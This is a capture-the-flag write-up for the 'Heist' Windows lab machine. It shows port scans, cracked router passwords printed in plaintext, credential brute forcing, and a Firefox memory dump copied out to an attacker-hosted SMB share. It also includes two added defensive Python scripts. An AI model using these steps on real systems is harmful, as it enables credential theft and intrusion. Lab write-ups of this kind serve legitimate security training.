Heist

Operating system: Windows
Difficulty: Easy
Release date: 10 August 2019
Creator: MinatoTW

Reconnaissance

We send an ICMP echo (ping) to the target machine to check that we have connectivity.

Initial enumeration

We run an nmap scan to discover which TCP ports are open on the victim machine.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.149  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:07 -03
Initiating SYN Stealth Scan at 22:07
Scanning 10.10.10.149 [65535 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Completed SYN Stealth Scan at 22:08, 26.51s elapsed (65535 total ports)
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.15s latency).
Scanned at 2025-01-03 22:07:56 -03 for 26s
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 127
135/tcp   open  msrpc        syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
5985/tcp  open  wsman        syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.58 seconds
           Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.012KB)

We run nmap's basic enumeration scripts to identify the version and the service running on each port.

nmap -sCV -p 80,135,445,5985,49669 -oN servicesScan -vvv 10.10.10.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:08 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
Initiating Ping Scan at 22:08
Scanning 10.10.10.149 [4 ports]
Completed Ping Scan at 22:08, 0.18s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:08
Completed Parallel DNS resolution of 1 host. at 22:08, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:08
Scanning 10.10.10.149 (10.10.10.149) [5 ports]
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Completed SYN Stealth Scan at 22:08, 0.18s elapsed (5 total ports)
Initiating Service scan at 22:08
Scanning 5 services on 10.10.10.149 (10.10.10.149)
Completed Service scan at 22:09, 56.18s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:09
NSE Timing: About 99.86% done; ETC: 22:10 (0:00:00 remaining)
Completed NSE at 22:10, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.01s elapsed
Nmap scan report for 10.10.10.149 (10.10.10.149)
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-01-03 22:08:51 -03 for 97s

PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m03s
| smb2-time: 
|   date: 2025-01-04T01:12:54
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48515/tcp): CLEAN (Timeout)
|   Check 2 (port 23914/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 64920/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.50 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (248B)

Initial exploitation

HTTP (80)

If we browse to port 80 we find the following web page, which presents a login form.

We log in as guest.

We see a conversation between the user Hazard and the user Admin. Hazard's first comment has a configuration file attached.

The file has the following contents:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
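As an added, defender-side example that is not part of the original writeup: a small Python audit script that reads an IOS-style configuration like the one above and reports how each stored credential is protected (type 7 reversible encoding, type 5 salted MD5, plaintext, or the PBKDF2/scrypt types 8 and 9), so that a configuration review catches this before the file is shared on a support forum. The severity labels, the regular expressions and the abridged copy of the config embedded as sample input are my own choices; the script does not decode anything, it only classifies.

```python
import re
from typing import Dict, List, Tuple

# Abridged copy of the configuration attached to Hazard's post (sample input for
# this example; the full file is reproduced in the writeup above).
SAMPLE_CONFIG = """version 12.2
no service pad
service password-encryption
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
ip ssh version 2
!
line vty 0 4
 transport input ssh
"""

# How each IOS credential storage type should be judged. The severity labels
# are this example's own convention, not a vendor rating.
TYPE_RATING: Dict[str, Tuple[str, str]] = {
    "0": ("critical", "type 0 is plaintext"),
    "7": ("critical", "type 7 is a reversible obfuscation, not a hash: anyone who can read the config can recover the password"),
    "5": ("high", "type 5 is salted MD5, cheap to crack offline with a wordlist"),
    "8": ("ok", "type 8 is PBKDF2-SHA256"),
    "9": ("ok", "type 9 is scrypt"),
}
SEVERITY_ORDER = ["ok", "unknown", "high", "critical"]

# 'username <name> [privilege <n>] password|secret [<type>] <value>'
USERNAME_RE = re.compile(
    r"^username\s+(?P<user>\S+)(?:\s+privilege\s+(?P<priv>\d+))?"
    r"\s+(?P<kw>password|secret)(?:\s+(?P<type>\d))?\s+(?P<value>\S+)$"
)
# 'enable password|secret [<type>] <value>'
ENABLE_RE = re.compile(
    r"^enable\s+(?P<kw>password|secret)(?:\s+(?P<type>\d))?\s+(?P<value>\S+)$"
)


def audit_cisco_config(config: str) -> List[Dict]:
    """Return one finding per stored credential, in configuration order."""
    findings: List[Dict] = []
    for lineno, raw in enumerate(config.splitlines(), start=1):
        line = raw.strip()
        m = USERNAME_RE.match(line) or ENABLE_RE.match(line)
        if not m:
            continue
        groups = m.groupdict()
        # A missing type digit means the value is stored as typed, i.e. type 0.
        ctype = groups.get("type") or "0"
        severity, note = TYPE_RATING.get(ctype, ("unknown", f"unrecognised type {ctype}"))
        findings.append({
            "line": lineno,
            "principal": groups.get("user") or "enable",
            "keyword": groups["kw"],
            "type": ctype,
            "privilege": int(groups["priv"]) if groups.get("priv") else None,
            "severity": severity,
            "note": note,
        })
    return findings


def worst_severity(findings: List[Dict]) -> str:
    """Highest severity present; 'ok' for an empty list."""
    return max((f["severity"] for f in findings), key=SEVERITY_ORDER.index, default="ok")


def report(config: str) -> List[str]:
    """Human-readable lines, one per finding, plus a remediation hint and the overall rating."""
    findings = audit_cisco_config(config)
    lines = [
        f"line {f['line']}: {f['principal']} ({f['keyword']} type {f['type']}"
        + (f", privilege {f['privilege']}" if f["privilege"] is not None else "")
        + f") -> {f['severity']}: {f['note']}"
        for f in findings
    ]
    if any(f["type"] in ("0", "7") for f in findings):
        lines.append("hint: 'service password-encryption' only produces type 7; "
                     "store secrets with 'algorithm-type scrypt' (type 9) instead")
    lines.append(f"overall: {worst_severity(findings)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CONFIG)))
```

Run against the sample it flags the enable secret as high (type 5) and both usernames as critical (type 7), the admin one additionally carrying privilege 15, which is exactly why a leaked copy of this file is as bad as a leaked password list.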

Finally, the user Hazard mentions the following:

“Thanks a lot. Also, please create an account for me on the windows server as I need to access the files.”

We crack the passwords using an online decoder.

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

We crack the hash $1$pdQG$o8nrSzsGXeaduXrjlvKc91 with John.

We brute force with NetExec using the passwords above and the likely usernames Administrator and Hazard.

Great, we found the password of the user hazard.

hazard:stealth1agent

The credentials are not valid for WinRM, but we can perform a RID brute force.

We run another credential brute-force attack.

chase:Q4)sJu\Y8qz*A3?d

The user chase can connect over WinRM.
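The two NetExec brute-force rounds above are what a defender would want to see in the Windows Security log: many 4625 failures from one source against several account names, followed by a 4624 network logon for one of them. (The RID cycling in between rides on hazard's valid credentials, so it appears as SAMR activity rather than as logon failures and is outside this example.) As an added example, not part of the original writeup, the Python below runs two simple detections over a constructed set of logon events shaped like those records; the event list, the field names, the thresholds and the window length are my own assumptions, not output from the target.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events (not real log output). Field names follow the
# Windows Security log 4625 (failed logon) / 4624 (successful logon) records;
# logon type 3 is a network logon, which is what SMB and WinRM produce.
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2025-01-03T22:15:01", "event_id": 4625, "user": "Administrator", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:15:01", "event_id": 4625, "user": "Administrator", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:15:02", "event_id": 4625, "user": "Hazard", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:15:02", "event_id": 4625, "user": "Hazard", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:15:03", "event_id": 4624, "user": "Hazard", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:20:10", "event_id": 4625, "user": "chase", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:20:10", "event_id": 4625, "user": "jason", "src_ip": "10.10.14.4", "logon_type": 3},
    {"time": "2025-01-03T22:20:11", "event_id": 4624, "user": "chase", "src_ip": "10.10.14.4", "logon_type": 3},
    # Benign noise: one interactive user mistyping a password once at the console.
    {"time": "2025-01-03T22:30:00", "event_id": 4625, "user": "chase", "src_ip": "192.168.1.50", "logon_type": 2},
]


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def detect_password_spray(events: List[Dict], window_minutes: int = 10, min_distinct_users: int = 3) -> List[Dict]:
    """One alert per source IP that fails logons for at least min_distinct_users
    different accounts inside some sliding window of window_minutes."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append((_ts(e), e["user"]))
    window = timedelta(minutes=window_minutes)
    alerts = []
    for src, fails in failures.items():
        fails.sort()
        best, start = set(), 0
        for end in range(len(fails)):
            # Advance the window start until the window fits.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_distinct_users:
            alerts.append({"kind": "password_spray", "src_ip": src,
                           "distinct_users": sorted(best), "failures": len(fails)})
    return alerts


def detect_success_after_failures(events: List[Dict], min_failures: int = 1) -> List[Dict]:
    """Alert when a (source, account) pair logs on successfully after having
    failed at least min_failures times: the signature of a guessed password."""
    prior = defaultdict(int)
    alerts = []
    for e in sorted(events, key=_ts):
        key = (e["src_ip"], e["user"])
        if e["event_id"] == 4625:
            prior[key] += 1
        elif e["event_id"] == 4624 and prior[key] >= min_failures:
            alerts.append({"kind": "success_after_failures", "src_ip": e["src_ip"],
                           "user": e["user"], "prior_failures": prior[key]})
    return alerts


def analyze(events: List[Dict]) -> List[Dict]:
    """Both detections over one event list."""
    return detect_password_spray(events) + detect_success_after_failures(events)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

On the sample, the spray detector fires once for 10.10.14.4 (four distinct accounts within a five-minute span) and the second detector fires for Hazard and chase, the two accounts whose passwords were guessed; the single console failure from 192.168.1.50 produces nothing. In production the same logic would be fed from event forwarding rather than an inline list, and the thresholds tuned to the environment's normal failure rate.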

We read the user.txt flag.

Privilege escalation

We see that Firefox is running; perhaps the user logged into the panel with Firefox and saved the credentials in it.

We upload the procdump.exe tool.

We create a share to transfer the file.

impacket-smbserver share -username guest -password guest -smb2support .

We mount the share on the victim machine.

net use x: \\10.10.14.4\share /user:guest guest

We copy the file.

cmd /c "copy firefox.dmp X:\"

If we intercept the login request with BurpSuite, we see that the login_password field carries the password.

We filter the firefox.dmp file with the strings command for the login_password field and find the credentials.

We connect as the Administrator user.

Administrator:4dD!5}x/re8]FBuZ

We read the root.txt flag.